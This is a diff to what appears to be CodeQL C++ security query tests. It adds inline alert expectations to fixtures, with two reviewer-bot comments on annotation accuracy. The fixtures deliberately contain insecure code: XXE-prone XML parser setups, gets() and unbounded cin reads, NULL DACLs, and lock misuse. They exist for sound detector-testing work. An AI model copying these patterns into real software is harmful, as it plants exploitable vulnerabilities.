XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(true); p->setCreateEntityReferenceNodes(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5(InputSource &data) { 
@@ -48,44 +48,44 @@ void test5(InputSource &data) { } void test6(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(true); p->parse(data); // GOOD p->setDisableDefaultEntityResolution(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert p->setDisableDefaultEntityResolution(true); p->parse(data); // GOOD p->setCreateEntityReferenceNodes(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert p->setCreateEntityReferenceNodes(true); p->parse(data); // GOOD } void test7(InputSource &data, bool cond) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(cond); - p->parse(data); // BAD (parser may not be correctly configured) + p->parse(data); // BAD (parser may not be correctly configured) // $ Alert } void test8(InputSource &data, bool cond) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source if (cond) { p->setDisableDefaultEntityResolution(true); } - p->parse(data); // BAD (parser may not be correctly configured) + p->parse(data); // BAD (parser may not be correctly configured) // $ Alert } void test9(InputSource &data) { { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source XercesDOMParser &q = *p; - q.parse(data); // BAD (parser not correctly configured) + q.parse(data); // BAD (parser not correctly configured) // $ Alert } { 
@@ -97,11 +97,11 @@ void test9(InputSource &data) { } { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source XercesDOMParser &q = *p; p->setDisableDefaultEntityResolution(true); - q.parse(data); // GOOD [FALSE POSITIVE] + q.parse(data); // GOOD [FALSE POSITIVE] // $ Alert } } @@ -110,16 +110,16 @@ void test10_doParseA(XercesDOMParser *p, InputSource &data) { } void test10_doParseB(XercesDOMParser *p, InputSource &data) { - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test10_doParseC(XercesDOMParser *p, InputSource &data) { - p->parse(data); // BAD (parser may not be correctly configured) + p->parse(data); // BAD (parser may not be correctly configured) // $ Alert } void test10(InputSource &data) { XercesDOMParser *p = new XercesDOMParser(); - XercesDOMParser *q = new XercesDOMParser(); + XercesDOMParser *q = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(true); test10_doParseA(p, data); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp index 8154536fd952..93b2f34f64d0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp @@ -17,9 +17,9 @@ class SAXParser // --- void test2_1(InputSource &data) { - SAXParser *p = new SAXParser(); + SAXParser *p = new SAXParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test2_2(InputSource &data) { 
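Review bot: The known false positive in `test9` (hunk at -97,11) is recorded as an ordinary expected result, because `q.parse(data); // GOOD [FALSE POSITIVE]` gets a plain `// $ Alert`. The inline-expectations format has a marker for results the query reports but should not, so the line would read `q.parse(data); // GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert`. That keeps the XXE query's imprecision visible in the test, and the test will flag the annotation for cleanup if the query is later fixed. The `// $ Source` added on the matching `new XercesDOMParser()` line probably needs the same treatment, which should be confirmed against how the post-processing query pairs sources with alerts. The same applies to `p_3_5->parse(data); // GOOD [FALSE POSITIVE] // $ Alert` in `test3_5` in tests3.cpp (hunk at -53,21).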
@@ -30,11 +30,11 @@ void test2_2(InputSource &data) { } void test2_3(InputSource &data) { - SAXParser *p = new SAXParser(); + SAXParser *p = new SAXParser(); // $ Source bool v = false; p->setDisableDefaultEntityResolution(v); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test2_4(InputSource &data) { @@ -46,9 +46,9 @@ void test2_4(InputSource &data) { } void test2_5(InputSource &data) { - SAXParser p; + SAXParser p; // $ Source - p.parse(data); // BAD (parser not correctly configured) + p.parse(data); // BAD (parser not correctly configured) // $ Alert } void test2_6(InputSource &data) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp index 064eadac4fa4..29b5a2b5e90d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp @@ -20,9 +20,9 @@ class XMLReaderFactory // --- void test3_1(InputSource &data) { - SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); + SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test3_2(InputSource &data) { @@ -32,10 +32,10 @@ void test3_2(InputSource &data) { p->parse(data); // GOOD } -SAX2XMLReader *p_3_3 = XMLReaderFactory::createXMLReader(); +SAX2XMLReader *p_3_3 = XMLReaderFactory::createXMLReader(); // $ Source void test3_3(InputSource &data) { - p_3_3->parse(data); // BAD (parser not correctly configured) + p_3_3->parse(data); // BAD (parser not correctly configured) // $ Alert } SAX2XMLReader *p_3_4 = XMLReaderFactory::createXMLReader(); 
@@ -45,7 +45,7 @@ void test3_4(InputSource &data) { p_3_4->parse(data); // GOOD } -SAX2XMLReader *p_3_5 = XMLReaderFactory::createXMLReader(); +SAX2XMLReader *p_3_5 = XMLReaderFactory::createXMLReader(); // $ Source void test3_5_init() { p_3_5->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true); @@ -53,21 +53,21 @@ void test3_5_init() { void test3_5(InputSource &data) { test3_5_init(); - p_3_5->parse(data); // GOOD [FALSE POSITIVE] + p_3_5->parse(data); // GOOD [FALSE POSITIVE] // $ Alert } void test3_6(InputSource &data) { - SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); + SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); // $ Source p->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test3_7(InputSource &data) { - SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); + SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); // $ Source p->setFeature(XMLUni::fgXercesHarmlessOption, true); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test3_8(InputSource &data) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp index 642c1866629b..bde073797ac1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp @@ -23,7 +23,7 @@ void xmlFreeDoc(xmlDoc *ptr); void test4_1(const char *fileName) { xmlDoc *p; - p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); 
@@ -33,7 +33,7 @@ void test4_1(const char *fileName) { void test4_2(const char *fileName) { xmlDoc *p; - p = xmlReadFile(fileName, NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -43,7 +43,7 @@ void test4_2(const char *fileName) { void test4_3(const char *fileName) { xmlDoc *p; - p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT | XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT | XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -74,7 +74,7 @@ void test4_6(const char *fileName) { xmlDoc *p; int flags = XML_PARSE_NOENT; - p = xmlReadFile(fileName, NULL, flags); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, flags); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -127,7 +127,7 @@ void test4_10(const char *ptr, int sz) { void test4_11(const char *ptr, int sz) { xmlDoc *p; - p = xmlReadMemory(ptr, sz, "", NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) + p = xmlReadMemory(ptr, sz, "", NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp index 063c47b025e4..b14a438ebb3b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp 
@@ -24,9 +24,9 @@ class DOMImplementationLS { // --- void test5_1(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5_2(DOMImplementationLS *impl, InputSource &data) { @@ -37,10 +37,10 @@ void test5_2(DOMImplementationLS *impl, InputSource &data) { } void test5_3(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source p->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5_4(DOMImplementationLS *impl, InputSource &data) { @@ -52,11 +52,11 @@ void test5_4(DOMImplementationLS *impl, InputSource &data) { } void test5_5(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source DOMConfiguration *cfg = p->getDomConfig(); cfg->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } DOMImplementationLS *g_impl; 
@@ -67,26 +67,26 @@ void test5_6_init() { g_p1 = g_impl->createLSParser(); g_p1->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, true); - g_p2 = g_impl->createLSParser(); + g_p2 = g_impl->createLSParser(); // $ Source } void test5_6() { test5_6_init(); g_p1->parse(*g_data); // GOOD - g_p2->parse(*g_data); // BAD (parser not correctly configured) + g_p2->parse(*g_data); // BAD (parser not correctly configured) // $ Alert } void test5_7(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert p->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, true); p->parse(data); // GOOD p->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5_8(DOMImplementationLS *impl, InputSource &data) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref index 5a35bf81fd99..a5067fc5ee1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousUseOfCin.ql +query: Security/CWE/CWE-676/DangerousUseOfCin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp index 704c2a87b3f3..a5d0d3019ae0 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp @@ -56,7 +56,7 @@ void CWE676_Use_of_Potentially_Dangerous_Function__basic_17_bad() char charBuffer[CHAR_BUFFER_SIZE]; /* FLAW: using cin in an inherently dangerous fashion */ /* INCIDENTAL CWE120 Buffer Overflow since cin extraction is unbounded. */ - cin >> charBuffer; // BAD + cin >> charBuffer; // BAD // $ Alert charBuffer[CHAR_BUFFER_SIZE-1] = '\0'; printLine(charBuffer); } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref index 5a35bf81fd99..a5067fc5ee1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousUseOfCin.ql +query: Security/CWE/CWE-676/DangerousUseOfCin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp index 4c5d4bb99bf7..75248ba1e978 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp @@ -49,7 +49,7 @@ void bad() { char buffer[BUFFER_SIZE]; // BAD: Use of 'cin' without specifying the length of the input. - cin >> buffer; + cin >> buffer; // $ Alert buffer[BUFFER_SIZE-1] = '\0'; } 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref index e46499468514..41d5b35b3c97 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousFunctionOverflow.ql +query: Security/CWE/CWE-676/DangerousFunctionOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref index 45388d46e2e3..8fb8f0fceafa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/PotentiallyDangerousFunction.ql +query: Security/CWE/CWE-676/PotentiallyDangerousFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c index 34ca23748c84..f3629169bbc3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c 
@@ -28,7 +28,7 @@ char *asctime(const struct tm *timeptr); // Code under test int is_morning() { - struct tm *now = gmtime(time(NULL)); // BAD: gmtime uses shared state + struct tm *now = gmtime(time(NULL)); // BAD: gmtime uses shared state // $ Alert[cpp/potentially-dangerous-function] return (now->tm_hour < 12); } @@ -39,13 +39,13 @@ void testGets() { char *buf2 = malloc(1024); char *s; - gets(buf1); // BAD: use of gets - s = gets(buf2); // BAD: use of gets + gets(buf1); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] + s = gets(buf2); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] } void testTime() { - struct tm *now = localtime(time(NULL)); // BAD: localtime uses shared state - char *time_string = ctime(time(NULL)); // BAD: localtime uses shared state - char *time_string2 = asctime(now); // BAD: localtime uses shared state + struct tm *now = localtime(time(NULL)); // BAD: localtime uses shared state // $ Alert[cpp/potentially-dangerous-function] + char *time_string = ctime(time(NULL)); // BAD: localtime uses shared state // $ Alert[cpp/potentially-dangerous-function] + char *time_string2 = asctime(now); // BAD: localtime uses shared state // $ Alert[cpp/potentially-dangerous-function] } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c index 61243f3db1a9..5bcdc9632d58 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c 
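Review bot: The explanatory comments on the `ctime` and `asctime` lines in testTime still read `BAD: localtime uses shared state`, so the human-readable reason names a different function from the one the new `Alert[cpp/potentially-dangerous-function]` tag is attached to. Since the commit rewrites both lines anyway, they could become `// BAD: ctime uses shared state // $ Alert[cpp/potentially-dangerous-function]` and `// BAD: asctime uses shared state // $ Alert[cpp/potentially-dangerous-function]`. That keeps the comment and the expectation pointing at the same call when someone later triages a change in the results.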
@@ -17,13 +17,13 @@ void test_open() { open(a_file, O_NONBLOCK); // GOOD open(a_file, O_RDWR | O_CLOEXEC); // GOOD open(a_file, O_APPEND); // GOOD - open(a_file, O_CREAT); // BAD + open(a_file, O_CREAT); // BAD // $ Alert[cpp/open-call-with-mode-argument] open(a_file, O_CREAT, 0); // GOOD - open(a_file, O_TMPFILE); // BAD + open(a_file, O_TMPFILE); // BAD // $ Alert[cpp/open-call-with-mode-argument] open(a_file, O_TMPFILE, 0); // GOOD openat(0, a_file, O_APPEND); // GOOD - openat(0, a_file, O_CREAT); // BAD + openat(0, a_file, O_CREAT); // BAD // $ Alert[cpp/open-call-with-mode-argument] openat(0, a_file, O_CREAT, 0); // GOOD - openat(0, a_file, O_TMPFILE); // BAD + openat(0, a_file, O_TMPFILE); // BAD // $ Alert[cpp/open-call-with-mode-argument] openat(0, a_file, O_TMPFILE, 0); // GOOD } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref index 68198ec2a3b1..e1ff489c2430 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-732/OpenCallMissingModeArgument.ql \ No newline at end of file +query: Security/CWE/CWE-732/OpenCallMissingModeArgument.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp index f2f7d80e44a2..09a32989a5ac 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp 
@@ -67,13 +67,13 @@ void Test() { PSECURITY_DESCRIPTOR pSecurityDescriptor; BOOL b; - b = SetSecurityDescriptorDacl(pSecurityDescriptor, + b = SetSecurityDescriptorDacl(pSecurityDescriptor, // $ Alert[cpp/unsafe-dacl-security-descriptor] TRUE, // Dacl Present NULL, // NULL pointer to DACL == BUG FALSE); PACL pDacl = NULL; - b = SetSecurityDescriptorDacl(pSecurityDescriptor, + b = SetSecurityDescriptorDacl(pSecurityDescriptor, // $ Alert[cpp/unsafe-dacl-security-descriptor] TRUE, // Dacl Present pDacl, // NULL pointer to DACL == BUG FALSE); @@ -117,7 +117,7 @@ void Test2() FALSE); PACL pDacl2 = returnNull(); - SetSecurityDescriptorDacl( + SetSecurityDescriptorDacl( // $ Alert[cpp/unsafe-dacl-security-descriptor] pSecurityDescriptor, TRUE, // Dacl Present pDacl2, // NULL pointer to DACL == BUG diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref index 6d8a0fc40192..3484b0b876b5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.ql \ No newline at end of file +query: Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp index de7ff6183f5d..72ca3bf6fb8e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/DiningPhilosophers.cpp 
@@ -20,11 +20,11 @@ namespace std template void unlock (Mutex1& a, Mutex2& b, Mutexes&... cde); } -std::mutex fork1; -std::mutex fork2; -std::mutex fork3; -std::mutex fork4; -std::mutex fork5; +std::mutex fork1; // $ Alert[cpp/lock-order-cycle] +std::mutex fork2; // $ Alert[cpp/lock-order-cycle] +std::mutex fork3; // $ Alert[cpp/lock-order-cycle] +std::mutex fork4; // $ Alert[cpp/lock-order-cycle] +std::mutex fork5; // $ Alert[cpp/lock-order-cycle] void eat(int ph); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref index 0c60fed4501b..fadfcb8e1229 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/LockOrderCycle.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-764/LockOrderCycle.ql +query: Security/CWE/CWE-764/LockOrderCycle.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref index 95a3396b1997..a7e200494031 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/TwiceLocked.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-764/TwiceLocked.ql +query: Security/CWE/CWE-764/TwiceLocked.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref index 4ea1070113d9..ca770b8b4a58 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/UnreleasedLock.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-764/UnreleasedLock.ql +query: Security/CWE/CWE-764/UnreleasedLock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp index 9114e545fd5e..67ad8f2dd58d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-764/semmle/tests/test.cpp @@ -22,8 +22,8 @@ namespace std void test_1() { std::mutex mtx; - mtx.lock(); - mtx.lock(); + mtx.lock(); // $ Alert[cpp/unreleased-lock] + mtx.lock(); // $ Alert[cpp/twice-locked] Alert[cpp/unreleased-lock] mtx.unlock(); } @@ -32,7 +32,7 @@ void test_2() { std::mutex mtx; mtx.lock(); - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] mtx.unlock(); mtx.unlock(); } @@ -51,7 +51,7 @@ void test_3() void test_4(bool something) { std::mutex mtx; - mtx.lock(); + mtx.lock(); // $ Alert[cpp/unreleased-lock] if (something) { mtx.unlock(); } else { @@ -85,8 +85,8 @@ void test_7() { std::mutex mtx1; std::mutex mtx2; - mtx1.lock(); - mtx2.lock(); + mtx1.lock(); // $ Alert[cpp/unreleased-lock] + mtx2.lock(); // $ Alert[cpp/unreleased-lock] std::unlock(mtx1, mtx2); } @@ -105,7 +105,7 @@ void test_8() void test_9() { std::mutex mtx; - if (mtx.try_lock()) { + if (mtx.try_lock()) { // $ Alert[cpp/unreleased-lock] return; } mtx.unlock(); @@ -134,7 +134,7 @@ std::mutex static_mtx02; // Helper function for testing the inter-procedural analysis. void set02() { - static_mtx02.lock(); + static_mtx02.lock(); // $ Alert[cpp/twice-locked] } // Helper function for testing the inter-procedural analysis. @@ -153,7 +153,7 @@ std::mutex static_mtx03; // Helper function for testing the inter-procedural analysis. void set03() { - static_mtx03.lock(); + static_mtx03.lock(); // $ Alert[cpp/twice-locked] } // Helper function for testing the inter-procedural analysis. 
@@ -174,7 +174,7 @@ void interproc_test_03(int n) { // BAD. void interproc_test_04(int n) { static std::mutex mtx; - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] if (n < 10) { // BAD: recursive call will attempt to lock the mutex again. interproc_test_04(n+1); @@ -215,7 +215,7 @@ void interproc_test_06() { void interproc_test_07() { std::mutex mtx; set(mtx); - set(mtx); + set(mtx); // $ Alert[cpp/twice-locked] unset(mtx); } @@ -224,7 +224,7 @@ void interproc_test_08(std::mutex &mtx, int n) { set(mtx); if (n < 10) { // BAD: recursive call will attempt to lock the mutex again. - interproc_test_08(mtx, n+1); + interproc_test_08(mtx, n+1); // $ Alert[cpp/twice-locked] } unset(mtx); } @@ -300,7 +300,7 @@ void interproc_test_09() { void test_10() { std::mutex mtx; - if (!mtx.try_lock()) { // [FALSE POSITIVE] + if (!mtx.try_lock()) { // [FALSE POSITIVE] // $ Alert[cpp/unreleased-lock] } else { mtx.unlock(); } @@ -310,7 +310,7 @@ void test_10() void test_11() { std::mutex mtx; - if (!mtx.try_lock()) { // [FALSE POSITIVE] + if (!mtx.try_lock()) { // [FALSE POSITIVE] // $ Alert[cpp/unreleased-lock] return; } @@ -357,7 +357,7 @@ void twice_locked_1() std::mutex mtx; mtx.lock(); - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] mtx.unlock(); mtx.unlock(); } @@ -380,13 +380,13 @@ void twice_locked_3() if (mtx.try_lock()) { - mtx.lock(); + mtx.lock(); // $ Alert[cpp/twice-locked] mtx.unlock(); mtx.unlock(); } } -std::mutex static_mtx_01a, static_mtx_01b; +std::mutex static_mtx_01a, static_mtx_01b; // $ Alert[cpp/lock-order-cycle] // BAD void lock_order_1(int cond) @@ -439,7 +439,7 @@ struct data_t { bool test_mutex(data_t *data) { - CHECK(mutex_lock(&(data->mutex))); // GOOD [FALSE POSITIVE] + CHECK(mutex_lock(&(data->mutex))); // GOOD [FALSE POSITIVE] // $ Alert[cpp/unreleased-lock] data->val = 1; CHECK(mutex_unlock(&(data->mutex))); 
